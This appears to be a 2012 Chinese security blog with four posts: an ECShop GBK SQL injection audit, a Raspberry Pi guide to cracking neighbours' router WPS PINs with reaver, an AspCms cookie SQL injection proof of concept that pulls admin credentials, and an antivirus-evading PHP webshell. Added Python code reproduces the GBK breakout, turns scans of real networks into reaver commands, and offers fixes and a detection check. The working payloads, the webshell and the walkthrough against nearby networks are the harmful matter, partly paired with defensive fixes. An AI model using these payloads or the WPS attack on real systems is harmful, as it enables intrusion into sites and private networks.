Code audit: ECShop V2.7.3 GBK release1106 SQL injection 0day and fix

Author: Secer    Published: December 30, 2012    Category: Web Security

C0deplay Team    j8g

The profile-edit handler (action act_edit_profile in user.php) of ECShop 2.7.3 release1106 is reproduced below. Note how $sel_question is read from $_POST as-is, and how both it and $passwd_answer are spliced straight into the UPDATE on the users table:

/* Handling for "edit profile" */
elseif ($action == 'act_edit_profile')
{
    include_once(ROOT_PATH . 'includes/lib_transaction.php');

    $birthday = trim($_POST['birthdayYear']) .'-'. trim($_POST['birthdayMonth']) .'-'.
    trim($_POST['birthdayDay']);
    $email = trim($_POST['email']);

    $other['msn'] = $msn = isset($_POST['extend_field1']) ? trim($_POST['extend_field1']) : '';
    $other['qq'] = $qq = isset($_POST['extend_field2']) ? trim($_POST['extend_field2']) : '';
    $other['office_phone'] = $office_phone = isset($_POST['extend_field3']) ? trim($_POST['extend_field3']) : '';
    $other['home_phone'] = $home_phone = isset($_POST['extend_field4']) ? trim($_POST['extend_field4']) : '';
    $other['mobile_phone'] = $mobile_phone = isset($_POST['extend_field5']) ? trim($_POST['extend_field5']) : '';

    $sel_question = empty($_POST['sel_question']) ? '' : $_POST['sel_question'];   // taken as-is, not even trimmed
    $passwd_answer = isset($_POST['passwd_answer']) ? trim($_POST['passwd_answer']) : '';

    /* Update the user's extended-field data */
    $sql = 'SELECT id FROM ' . $ecs->table('reg_fields') . ' WHERE type = 0 AND display = 1 ORDER BY dis_order, id';   // read the ids of all extended fields
    $fields_arr = $db->getAll($sql);
    foreach ($fields_arr AS $val)       // update each extended field in turn
    {
        $extend_field_index = 'extend_field' . $val['id'];
        if(isset($_POST[$extend_field_index]))
        {
            $temp_field_content = strlen($_POST[$extend_field_index]) > 100 ? mb_substr(htmlspecialchars($_POST[$extend_field_index]), 0, 99) : htmlspecialchars($_POST[$extend_field_index]);
            $sql = 'SELECT * FROM ' . $ecs->table('reg_extend_info') . "  WHERE reg_field_id = '$val[id]' AND user_id = '$user_id'";
            if ($db->getOne($sql))      // a row exists already: update it
            {
                $sql = 'UPDATE ' . $ecs->table('reg_extend_info') . " SET content = '$temp_field_content' WHERE reg_field_id = '$val[id]' AND user_id = '$user_id'";
            }
            else                        // no row yet: insert one
            {
                $sql = 'INSERT INTO '. $ecs->table('reg_extend_info') . " (`user_id`, `reg_field_id`, `content`) VALUES ('$user_id', '$val[id]', '$temp_field_content')";
            }
            $db->query($sql);
        }
    }

    /* Write the password-hint question and answer */
    if (!empty($passwd_answer) && !empty($sel_question))
    {
        // both values are concatenated straight into the statement
        $sql = 'UPDATE ' . $ecs->table('users') . " SET `passwd_question`='$sel_question', `passwd_answer`='$passwd_answer'  WHERE `user_id`='" . $_SESSION['user_id'] . "'";
        echo $sql;      // debug print of the assembled query
        $db->query($sql);
    }

[Screenshots: clip_image001, clip_image002]
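What follows is an added example, written for this page in Python rather than taken from the post or from ECShop, to make the "GBK" in the title concrete. ECShop's bootstrap runs an addslashes-style escape over the request arrays, so a bare quote in sel_question arrives as \' and a plain payload fails. Under a GBK connection charset, however, a lead byte such as 0xBF followed by the escaping backslash (0x5C, a valid GBK trail byte) is read by the server as one two-byte character, and the quote after it is live again. The addslashes() emulation, the use of a Python decode to stand in for the server's reading of the query text, the table name ecs_users and the SQLite table used by the hardened variant are all this example's own assumptions.

```python
# Added example (not ECShop code, not from the post): reconstructs the
# passwd_question UPDATE from the handler above and shows why the build's
# charset matters. Assumptions, all this example's own: addslashes() is
# emulated byte for byte, a Python decode with the connection charset stands
# in for how the MySQL server reads the query text, and ecs_users is the
# default table name.
import sqlite3

USERS_TABLE = "ecs_users"


def addslashes(data: bytes) -> bytes:
    """PHP addslashes(): a backslash before ' " \\ and NUL, one byte at a time."""
    out = bytearray()
    for b in data:
        if b in b"'\"\\\x00":
            out.append(0x5C)
        out.append(b)
    return bytes(out)


def build_update(sel_question: bytes, passwd_answer: bytes, user_id: int) -> bytes:
    """Same assembly as the handler: values spliced into single quotes."""
    return (b"UPDATE " + USERS_TABLE.encode() +
            b" SET `passwd_question`='" + sel_question +
            b"', `passwd_answer`='" + passwd_answer +
            b"' WHERE `user_id`='" + str(user_id).encode() + b"'")


def decoded_query(sel_question: bytes, charset: str) -> str:
    """The query as the server sees it: escaped the way the bootstrap does,
    then decoded with the connection charset."""
    escaped = addslashes(sel_question)
    return build_update(escaped, b"answer", 1).decode(charset, errors="replace")


def value_breaks_out(sel_question: bytes, charset: str) -> bool:
    """Does a quote in the escaped value survive as a live string terminator?
    Under utf-8 (or any single-byte charset) every quote keeps its backslash.
    Under gbk a 0xBF lead byte swallows the backslash (0x5C) as its trail
    byte, forming one two-byte character, and the quote after it is unescaped."""
    text = addslashes(sel_question).decode(charset, errors="replace")
    i = 0
    while i < len(text):
        if text[i] == "\\":      # a backslash escapes the next character
            i += 2
            continue
        if text[i] == "'":
            return True
        i += 1
    return False


def hardened_update(sel_question: bytes, passwd_answer: bytes, user_id: int):
    """The fix: bind the values instead of splicing them. The driver sends
    them out of band, so no byte sequence can end the literal. Shown on an
    in-memory SQLite table with two constructed users."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE ecs_users (user_id INTEGER, passwd_question BLOB, passwd_answer BLOB)")
    conn.executemany("INSERT INTO ecs_users VALUES (?, ?, ?)",
                     [(1, b"q1", b"a1"), (2, b"q2", b"a2")])
    conn.execute("UPDATE ecs_users SET passwd_question=?, passwd_answer=? WHERE user_id=?",
                 (sel_question, passwd_answer, user_id))
    rows = conn.execute("SELECT user_id, passwd_question FROM ecs_users ORDER BY user_id").fetchall()
    conn.close()
    return rows


if __name__ == "__main__":
    # Illustrative value: lead byte, quote, then a comment marker that would
    # swallow the rest of the statement including the WHERE clause.
    payload = b"\xbf' #"
    print(decoded_query(payload, "utf-8"))
    print(decoded_query(payload, "gbk"))
    print("breaks out under utf-8:", value_breaks_out(payload, "utf-8"))
    print("breaks out under gbk:  ", value_breaks_out(payload, "gbk"))
    print(hardened_update(payload, b"x", 1))
```

Run stand-alone it prints the query twice, once decoded as UTF-8 with the backslash still in front of the quote and once as GBK with the literal closed early, and then shows that the bound version stores the payload bytes verbatim for user 1 and leaves user 2 untouched.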

Running aircrack-ng and reaver on a Raspberry Pi to crack router WPS PINs

Author: Secer    Published: December 28, 2012    Category: Wireless Security

Disclaimer: this article is for security study only. I recently got the urge to test every wireless network in my neighbourhood. Since most routers today support WPS, you all know aircrack-ng and reaver, the must-have tools for cracking PINs. Running a brute-force tool like reaver used to mean leaving a desktop on around the clock, which wastes a lot of power, not green at all!
The Raspberry Pi, for its part, makes a very capable attack box. Enthusiasts abroad have already built a Debian-based system for the board dedicated to network attack and testing, but this article is about installing aircrack-ng and reaver on the official Raspberry Pi distribution. I power the Pi from an Apple charger and a Mini USB cable, and a single Alfa wireless card is enough. With power draw this low it is the ideal setup for grinding through PINs online and for long-running wireless capture.

PS: those who already know this can move along... Without further ado, the installation goes as follows.

1. Prepare the build environment

apt-get install -y libpcap-dev libsqlite3-dev sqlite3 libpcap0.8-dev libssl-dev build-essential iw tshark subversion

 

2. Install aircrack-ng

svn co http://trac.aircrack-ng.org/svn/trunk aircrack-ng
cd aircrack-ng/
make
make install
cd ../

 

3. Install reaver (1.4)

wget http://reaver-wps.googlecode.com/files/reaver-1.4.tar.gz
tar zxvf reaver-1.4.tar.gz
cd reaver-1.4/src
./configure
make
make install
cd ../

 

4. Use airodump-ng from the aircrack-ng suite to survey nearby access points (evil... hehe). Note that airodump-ng does not show whether WPS is enabled on an AP; reaver 1.4 ships the wash scanner for that (wash -i mon0), which is the check to run before pointing reaver at a target.

airmon-ng start wlan0
airodump-ng mon0
CH 11 ][ Elapsed: 36 s ][ 2012-12-18 04:46
BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
00:0E:2E:FD:C4:BB   -1        0        0    0  -1  -1                    <length:  0>
4C:E6:76:60:3F:20  -13      123        0    0  11  54e  WPA2 CCMP   PSK  cuier-1
B0:48:7A:52:F4:72  -23       42        0    0   1  54e. WPA2 CCMP   PSK  FAST_52F472
8C:21:0A:5F:A2:FA  -35       28        0    0   1  54e. WPA2 CCMP   PSK  TP-LINK_5FA2FA
E0:05:C5:D3:3F:00  -42       33        0    0   2  54e. WPA2 CCMP   PSK  TP-LINK_D33F00
EC:17:2F:7D:12:1E  -49       56        1    0   6  54e. WPA2 CCMP   PSK  wg7788
B0:48:7A:5D:22:EA  -51       36        0    0   6  54e. WPA2 CCMP   PSK  TP-LINK_1202
C4:CA:D9:6D:6F:B0  -52       30       10    0  11  54e. OPN              ChinaNet
8C:21:0A:8F:2F:1A  -54       18        0    0   1  54e. WPA2 CCMP   PSK  hechengyv
E0:05:C5:C5:70:E8  -55       15        0    0   4  54e. WPA2 CCMP   PSK  wtangqiu
C8:3A:35:55:D1:D8  -55       20        2    0   7  54e. WPA  CCMP   PSK  Tenda_55D1D8
8C:21:0A:84:89:8C  -56       24        0    0   1  54e. WPA2 CCMP   PSK  BATE
C4:CA:D9:6D:5F:60  -55       15        2    0   6  54e. OPN              ChinaNet
EC:17:2F:54:01:2E  -56       13        0    0   1  54e. WPA2 CCMP   PSK  diguadawang
5C:63:BF:74:56:52  -53       18        2    0   1  54e. WPA2 CCMP   PSK  cocohe
08:10:76:40:C2:92  -58       21        0    0   1  54e  WPA2 CCMP   PSK  flytv
E0:05:C5:C0:60:42  -56       21        0    0   9  54e. WPA2 CCMP   PSK  HZLYL
38:83:45:C1:BE:F8  -59       14        1    0   6  54e. WPA2 CCMP   PSK  TICO081122
C4:CA:D9:74:B3:80  -57       13        1    0  11  54e. OPN              ChinaNet
EC:88:8F:AB:F6:5E  -59        5        0    0   4  54e. WPA2 CCMP   PSK  TP-LINK_ABF65E
6C:E8:73:B0:67:78  -59        8        0    0   6  54e. WPA2 CCMP   PSK  WJJ~LOVE~WW
C8:3A:35:19:D6:78  -61        9        0    0   1  54e  WPA  CCMP   PSK  Tenda_19D678
E0:05:C5:19:9C:04  -61       18        0    0   7  54 . WPA2 CCMP   PSK  1-14-1-602
C8:64:C7:5A:46:16  -60        3        0    0  11  54e  WPA  CCMP   PSK  STB_CDCF
6C:E8:73:45:A7:E6  -60        6        0    0   4  54e. WPA2 CCMP   PSK  TP-LINK_45A7E6
1C:BD:B9:F5:E5:D7  -61       16        0    0   1  54   WPA2 CCMP   PSK  D-Link_DIR-600M
C4:CA:D9:6D:6E:B0  -61       12        0    0   1  54e. OPN              ChinaNet
C8:64:C7:5A:46:15  -61       17        0    0  11  54e  WPA  CCMP   PSK  VIDEOPHONE_CDCF
C8:64:C7:5A:46:17  -61       12        0    0  11  54e  WPA  CCMP   PSK  BACKUP
EC:88:8F:99:75:F2  -61        5        0    0   4  54e. WPA2 CCMP   PSK  6786
8C:21:0A:1E:60:26  -61        3        0    0   1  54e. WPA2 CCMP   PSK  yue
00:23:CD:5B:A7:9E  -61        2        0    0   6  54 . WEP  WEP         1203 wireless
14:E6:E4:44:9B:8E  -62        6        0    0   4  54e. WPA2 CCMP   PSK  bujiankai
00:1D:0F:81:72:06  -62        4        0    0   6  54 . WEP  WEP         Line
FC:C8:97:94:B6:C8  -62        7        0    0  11  54e  WPA  CCMP   PSK  CU_6cmn
B0:48:7A:2A:1B:E6  -62        7        0    0   6  54e. WPA  CCMP   PSK  302
EC:88:8F:8F:CD:BB  -62       11        0    0  11  54e. WPA2 CCMP   PSK  haloso2
EC:17:2F:AC:44:A2  -62        7        0    0   1  54e. WPA2 CCMP   PSK  1-401
C8:64:C7:5A:46:14  -63       24        0    0  11  54e  WPA  CCMP   PSK  CU_CDCF
38:83:45:B5:E3:96  -63        6        0    0   1  54e. WPA2 CCMP   PSK  TP-LINK_B5E396
C8:3A:35:2B:35:68  -63       11        0    0  11  54e  WPA2 CCMP   PSK  Tenda_2B3568
00:27:19:6D:4A:5A  -63        1        0    0  11  54e. WPA2 CCMP   PSK  JUJIA-FOGUANG
FC:C8:97:94:B6:CB  -65        9        0    0  11  54e  WPA  CCMP   PSK  BACKUP
FC:C8:97:94:B6:C9  -63       15        0    0  11  54e  WPA  CCMP   PSK  VIDEOPHONE_6cmn
C8:3A:35:06:63:B0  -64        3        0    0   1  54e  WPA2 CCMP   PSK  Tenda_0663B0
8C:21:0A:B0:22:92  -64        3        0    0   1  54e. WPA2 CCMP   PSK  810
14:E6:E4:4F:DE:FE  -64        3        0    0   1  54e. WPA2 CCMP   PSK  YM+ZM
FC:C8:97:94:B6:CA  -65       13        0    0  11  54e  WPA  CCMP   PSK  STB_6cmn
C8:3A:35:52:70:60  -65        2        0    0  11  54e. WPA  CCMP   PSK  Tenda_527060
00:26:5A:B3:08:7E  -65        8        0    0  13  54e  WPA2 CCMP   PSK  503
F4:EC:38:56:6B:DE  -62        2        0    0   9  54e. WPA2 CCMP   PSK  WTO
14:D6:4D:A0:19:60  -62        3        0    0  11  54e  WPA2 TKIP   PSK  wang~XB
C4:CA:D9:6D:6F:40  -62        1        0    0   1  54e. OPN              ChinaNet
^C

Done. There really are a lot of wireless networks in the neighbourhood... mainly thanks to the Alfa card... heh.

5. Use reaver to crack the passphrase of a WPS-enabled router. Take this one, for instance; the signal is decent:

8C:21:0A:5F:A2:FA -35 28 0 0 1 54e. WPA2 CCMP PSK TP-LINK_5FA2FA

~/soft/reaver-1.4# reaver -i mon0 -b 8C:21:0A:5F:A2:FA -a -S -vv -d2 -t 5 -c 1
Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner
[+] Switching mon0 to channel 1
[+] Waiting for beacon from 8C:21:0A:5F:A2:FA
[+] Associated with 8C:21:0A:5F:A2:FA (ESSID: TP-LINK_5FA2FA)
[+] Trying pin 12345670
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] Trying pin 00005678
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] Trying pin 01235678
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] Trying pin 11115670
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
^C

 

That starts the attack; now just wait patiently for the result... and don't be too evil. Testing is fine, but be a good kid...

##########################################################################
Some tips on tuning reaver's parameters

reaver:
-i   interface name (the monitor-mode interface)
-b   target MAC address (BSSID)
-a   auto-detect the best settings for the target AP
-S   use small DH keys (speeds up the attack)
-vv  verbose, also shows non-critical warnings
-d   delay between PIN attempts, default 1 second
-t   timeout, the longest wait for a reply to each attempt
-c   channel; -c1 pins the card to channel 1, change it to your target's channel. For non-TP-LINK routers -d9 -t9 is recommended so the router does not lock up.
Example:
reaver -i mon0 -b MAC -a -S -d9 -t9 -vv
Adjust to conditions (all examples assume the target is on channel 1):
Very good signal:  reaver -i mon0 -b MAC -a -S -vv -d0 -c 1
Normal signal:     reaver -i mon0 -b MAC -a -S -vv -d2 -t 5 -c 1
Weaker signal:     reaver -i mon0 -b MAC -a -S -vv -d5 -c 1
The reason for the slower tiers: many APs rate-limit WPS after a run of failed attempts, at which point reaver prints "Detected AP rate limiting" and sleeps before retrying, so a shorter delay does not always finish sooner.
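As an added example that is not part of the post, the Python below parses an airodump-ng listing like the one in step 4, keeps only the WPA/WPA2-PSK networks, ranks them by signal and builds the reaver command line for each according to the tiers above. The sample rows are copied from the listing. The dBm cut-offs that map "very good / normal / weaker" onto the tiers are this example's own assumption; the post gives no numbers.

```python
# Added example (not from the post): parse an airodump-ng listing such as the
# one above, keep WPA/WPA2-PSK networks, rank them by signal and build the
# reaver command line following the post's tuning tiers. The PWR cut-offs
# are this example's own assumption.
import re

# Five rows lifted from the airodump-ng output above (constructed sample input).
SAMPLE = """\
BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
4C:E6:76:60:3F:20  -13      123        0    0  11  54e  WPA2 CCMP   PSK  cuier-1
8C:21:0A:5F:A2:FA  -35       28        0    0   1  54e. WPA2 CCMP   PSK  TP-LINK_5FA2FA
C4:CA:D9:6D:6F:B0  -52       30       10    0  11  54e. OPN              ChinaNet
00:23:CD:5B:A7:9E  -61        2        0    0   6  54 . WEP  WEP         1203 wireless
C8:3A:35:55:D1:D8  -55       20        2    0   7  54e. WPA  CCMP   PSK  Tenda_55D1D8
"""

# Columns: BSSID PWR Beacons #Data #/s CH MB ENC ...; the MB field appears
# as "54e", "54e.", "54 ." or "-1", hence the loose pattern for it.
ROW = re.compile(
    r"^(?P<bssid>(?:[0-9A-F]{2}:){5}[0-9A-F]{2})\s+(?P<pwr>-?\d+)\s+\d+\s+\d+\s+\d+\s+"
    r"(?P<ch>-?\d+)\s+-?\d+ ?e?\.?\s+(?P<enc>WPA2|WPA|WEP|OPN)\s+(?P<rest>.*)$"
)


def parse_airodump(text: str) -> list:
    """Turn the fixed-width table into dicts; lines that are not AP rows are skipped."""
    rows = []
    for line in text.splitlines():
        m = ROW.match(line.strip())
        if not m:
            continue
        enc, rest = m.group("enc"), m.group("rest").strip()
        if enc in ("WPA", "WPA2"):
            cipher, auth, essid = rest.split(None, 2)
        elif enc == "WEP":
            parts = rest.split(None, 1)          # "WEP" then the ESSID
            cipher, auth, essid = "WEP", "", (parts[1] if len(parts) > 1 else "")
        else:
            cipher, auth, essid = "", "", rest
        rows.append({"bssid": m.group("bssid"), "pwr": int(m.group("pwr")),
                     "ch": int(m.group("ch")), "enc": enc, "cipher": cipher,
                     "auth": auth, "essid": essid})
    return rows


def candidates(text: str) -> list:
    """WPA/WPA2-PSK networks only, strongest signal first (PWR is negative dBm)."""
    psk = [r for r in parse_airodump(text)
           if r["enc"] in ("WPA", "WPA2") and r["auth"] == "PSK"]
    return sorted(psk, key=lambda r: r["pwr"], reverse=True)


def reaver_command(bssid: str, channel: int, pwr: int, iface: str = "mon0") -> str:
    """The post's three tiers; the dBm cut-offs are assumed, not from the post."""
    base = f"reaver -i {iface} -b {bssid} -a -S -vv"
    if pwr >= -30:        # very good signal (assumed cut-off)
        tier = "-d0"
    elif pwr >= -50:      # normal signal (assumed cut-off)
        tier = "-d2 -t 5"
    else:                 # weaker signal
        tier = "-d5"
    return f"{base} {tier} -c {channel}"


if __name__ == "__main__":
    for ap in candidates(SAMPLE):
        print(f"{ap['essid']:<16} {ap['pwr']:>4} dBm  ch {ap['ch']:>2}  "
              + reaver_command(ap["bssid"], ap["ch"], ap["pwr"]))
```

With the sample rows the TP-LINK_5FA2FA entry at -35 dBm lands in the middle tier, which reproduces the exact command line used in step 5.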

AspCms_v1.5_20110517 SQL injection

Author: Secer    Published: December 25, 2012    Category: Web Security


A few days ago I came across a small site running AspCms. A quick search showed that productbuy.asp has an injection, but the target had already been patched... so I downloaded the source. Oddly, although the vendor did fix the publicly reported hole in productbuy.asp, there is another injection a little further down in the very same file.
Without further ado, the code:

<%
if action = "buy" then
    addOrder()
else
    echoContent()
end if

... (omitted)

Sub echoContent()
    dim id
    id=getForm("id","get")
    
    if isnul(id) or not isnum(id) then alertMsgAndGo "请选择产品!","-1"    ' id is gated: it must be numeric
    
    dim templateobj,channelTemplatePath : set templateobj = mainClassobj.createObject("MainClass.template")
    dim typeIds,rsObj,rsObjtid,Tid,rsObjSmalltype,rsObjBigtype,selectproduct
    Dim templatePath,tempStr
    templatePath = "/"&sitePath&"templates/"&defaultTemplate&"/"&htmlFilePath&"/productbuy.html"

    set rsObj=conn.Exec("select title from aspcms_news where newsID="&id,"r1")    ' safe only because of the isnum() check above
    selectproduct=rsObj(0)
    
    Dim linkman,gender,phone,mobile,email,qq,address,postcode
    if isnul(rCookie("loginstatus")) then wCookie "loginstatus",0
    if rCookie("loginstatus")=1 then
        ' userID comes from a client-controlled cookie and gets nothing but trim() before concatenation
        set rsObj=conn.Exec("select *from aspcms_Users where UserID="&trim(rCookie("userID")),"r1")
        linkman=rsObj("truename")
        gender=rsObj("gender")
        phone=rsObj("phone")
        mobile=rsObj("mobile")
        email=rsObj("email")
        qq=rsObj("qq")
        address=rsObj("address")
        postcode=rsObj("postcode")
    else 
        gender=1
    end if
    rsObj.close()
        
    with templateObj 
        .content=loadFile(templatePath)    
        .parseHtml()
        .content=replaceStr(.content,"{aspcms:selectproduct}",selectproduct)
        .content=replaceStr(.content,"[aspcms:linkman]",linkman)        
        .content=replaceStr(.content,"[aspcms:gender]",gender)        
        .content=replaceStr(.content,"[aspcms:phone]",phone)        
        .content=replaceStr(.content,"[aspcms:mobile]",mobile)        
        .content=replaceStr(.content,"[aspcms:email]",email)            
        .content=replaceStr(.content,"[aspcms:qq]",qq)            
        .content=replaceStr(.content,"[aspcms:address]",address)            
        .content=replaceStr(.content,"[aspcms:postcode]",postcode)    
        .parseCommon()         
        echo .content 
    end with
    set templateobj =nothing : terminateAllObjects
End Sub

The flaw is obvious: id is validated with isnum() before it reaches the first query, but once the loginstatus cookie is set to 1 the userID cookie goes into the second query after nothing more than trim(). Both cookies are client-controlled, so no account is needed. The columns read from that query are written into the template ([aspcms:linkman] and the rest), which is where a UNION's output shows up on the page.
PoC (set the two cookies from the address bar, then request productbuy.asp with a valid numeric id):

javascript:alert(document.cookie="loginstatus=" + escape("1"));alert(document.cookie="userID=" + escape("1 union select 1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2 from [Aspcms_Admins]"));
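An added example, in Python on SQLite rather than AspCms's own ASP, that models the two lookups in echoContent() so the difference between the validated id and the raw userID cookie can be run. Table schemas are trimmed to three columns and every row is constructed; AspCms's real aspcms_Users has more columns, which is why the PoC pads its UNION with 22 values. isnum() is assumed to accept digits only, since the helper is not shown in the post.

```python
# Added example (not AspCms code, not from the post): the two lookups of
# echoContent() reproduced on an in-memory SQLite database. Schemas are cut
# down to three columns and all rows are constructed; isnum() is assumed to
# accept digits only, as the helper itself is not shown.
import sqlite3


def isnum(value: str) -> bool:
    return value.isdigit()


def setup() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE aspcms_news   (newsID INTEGER, title TEXT);
        CREATE TABLE aspcms_Users  (UserID INTEGER, truename TEXT, phone TEXT);
        CREATE TABLE Aspcms_Admins (AdminID INTEGER, LoginName TEXT, Password TEXT);
        INSERT INTO aspcms_news   VALUES (1, 'Product one');
        INSERT INTO aspcms_Users  VALUES (1, 'Alice', '555-0100');
        INSERT INTO Aspcms_Admins VALUES (1, 'admin', '21232f297a57a5a743894a0e4a801fc3');
    """)
    return conn


def echo_content_vulnerable(conn, id_param: str, cookies: dict):
    """Mirrors the ASP: id is gated by isnum(); the userID cookie is not."""
    if not id_param or not isnum(id_param):
        return None                                   # alertMsgAndGo "请选择产品!"
    title = conn.execute("select title from aspcms_news where newsID=" + id_param).fetchone()[0]
    linkman = phone = ""
    if cookies.get("loginstatus") == "1":
        user_id = cookies.get("userID", "0").strip()  # trim(rCookie("userID"))
        row = conn.execute("select * from aspcms_Users where UserID=" + user_id).fetchone()
        if row:
            linkman, phone = row[1], row[2]
    return {"selectproduct": title, "linkman": linkman, "phone": phone}


def echo_content_hardened(conn, id_param: str, cookies: dict):
    """Same flow with the cookie value validated and both values bound.
    Deciding "logged in" from a client-writable cookie is still wrong: with a
    numeric userID anyone can read any user's profile. The session has to be
    server-side; this function only closes the injection."""
    if not id_param or not isnum(id_param):
        return None
    title = conn.execute("select title from aspcms_news where newsID=?", (int(id_param),)).fetchone()[0]
    linkman = phone = ""
    user_id = cookies.get("userID", "").strip()
    if cookies.get("loginstatus") == "1" and isnum(user_id):
        row = conn.execute("select * from aspcms_Users where UserID=?", (int(user_id),)).fetchone()
        if row:
            linkman, phone = row[1], row[2]
    return {"selectproduct": title, "linkman": linkman, "phone": phone}


# A UNION whose column count matches aspcms_Users (three here, 22 in the PoC).
PAYLOAD = "0 union select AdminID,LoginName,Password from [Aspcms_Admins]"

if __name__ == "__main__":
    conn = setup()
    forged = {"loginstatus": "1", "userID": PAYLOAD}
    print(echo_content_vulnerable(conn, "1", forged))   # admin name and hash land in linkman/phone
    print(echo_content_hardened(conn, "1", forged))     # cookie rejected, fields stay empty
```

The vulnerable path returns the admin login and password hash in the linkman and phone fields, exactly the slots the template renders; the hardened path rejects the cookie. The square-bracket table name works in SQLite as it does in Access/SQL Server, which is why the original PoC can use it.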

Building an AV-evading PHP webshell from repeated array parameters

Author: Secer    Published: December 25, 2012    Category: Web Security, Hacking Tricks

I recently noticed a rather silly way in which PHP builds arrays out of a query string:


<?php
$str = "a[]=1&a[]=2&b[]=3";
parse_str($str, $arr);
print_r($arr);
?>

 

The code above prints:
Array ( [a] => Array ( [0] => 1 [1] => 2 ) [b] => Array ( [0] => 3 ) )

In other words, when a name is followed by [] and occurs more than once, the resulting array uses that name as the key and collects every value given to it, in order, as a nested array (clumsy in words; the code makes it obvious).

That raises a question. Suppose a URL looks like this:

http://example.com?p1=v1&p2=v2&p3=v3&p1=v4&p2=v5

var_dump($_GET['p1']) then gives v1 or v4 depending on the environment (PHP itself keeps the last one, v4). What if p1 is renamed to p1[]?
The result becomes Array ( [p1] => Array ( [0] => v1 [1] => v4 ) ).

Ha, you can see where this is going. Rewrite the URL as:

http://127.0.0.1/1.php?p1[]=phpinfo&p2[]=ass&p3=v3&p1[]=();&p2[]=ert

and suppose the PHP on the server reads:
<?php
$a=implode("",$_GET['p1']);   // "phpinfo" . "();"  =>  phpinfo();
$b=implode("",$_GET['p2']);   // "ass" . "ert"      =>  assert
var_dump($_GET['p1']);
var_dump($_GET['p2']);
$b($a);                       // assert("phpinfo();")
?>

Yet another AV-evading PHP webshell is born. Time to witness the miracle! No single parameter value contains a function name a signature could match; the dangerous strings only exist after implode(). (The trick relies on assert() evaluating a string argument, which PHP 7.2 deprecated and PHP 8.0 removed.)
by maoniu http://blog.wegeek.org/index.php/archives/28.html
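As an added example that is not from the post, here is a Python emulation of how PHP's parse_str() and $_GET handle the two forms shown above, followed by the comparison that matters to anyone writing a WAF rule or a scanner: checking each raw value on its own versus checking the values after the same implode() the shell performs. The emulation is this example's own and covers plain keys and the trailing-[] form only, not PHP's nested a[b][c] keys; the set of code-execution functions is an illustrative selection.

```python
# Added example (not from the post): emulate PHP's handling of repeated keys
# in a query string, then compare a per-value check with a check on the
# reassembled values. Own code; only plain keys and the trailing "[]" form
# are modelled, nested keys are not.
from urllib.parse import unquote_plus

# Illustrative selection of functions that execute a string as code or a command.
PHP_CALLERS = {"assert", "eval", "system", "passthru", "shell_exec", "exec", "popen"}


def php_parse_query(query: str) -> dict:
    """Mirror PHP: `k[]=v` appends to a list under k, while a plain `k=v` that
    repeats keeps the last value, which answers the post's v1/v4 question."""
    result = {}
    for pair in query.split("&"):
        if not pair:
            continue
        key, _, value = pair.partition("=")
        key, value = unquote_plus(key), unquote_plus(value)
        if key.endswith("[]"):
            result.setdefault(key[:-2], []).append(value)
        else:
            result[key] = value
    return result


def reassembled_values(query: str) -> dict:
    """What the target script sees after implode("", $_GET[k]) on each array."""
    return {k: "".join(v) if isinstance(v, list) else v
            for k, v in php_parse_query(query).items()}


def per_value_match(query: str) -> list:
    """The naive check: look at every raw value separately. "ass" and "ert"
    are harmless on their own, so this finds nothing."""
    hits = set()
    for k, v in php_parse_query(query).items():
        for item in (v if isinstance(v, list) else [v]):
            if item.strip() in PHP_CALLERS:
                hits.add(k)
    return sorted(hits)


def flag_split_callers(query: str) -> list:
    """The check that works: join repeated array entries first, then compare.
    Returns the parameter names whose joined value is a code-execution callable."""
    joined = reassembled_values(query)
    return sorted(k for k, v in joined.items() if v.strip() in PHP_CALLERS)


if __name__ == "__main__":
    url_query = "p1[]=phpinfo&p2[]=ass&p3=v3&p1[]=();&p2[]=ert"   # the post's URL
    print(php_parse_query(url_query))
    print(reassembled_values(url_query))
    print("per-value check flags:", per_value_match(url_query))
    print("joined check flags:   ", flag_split_callers(url_query))
```

The joined check is the one to run on request parameters; a rule that inspects each p2[] entry in isolation never sees the word "assert", which is the whole point of the trick.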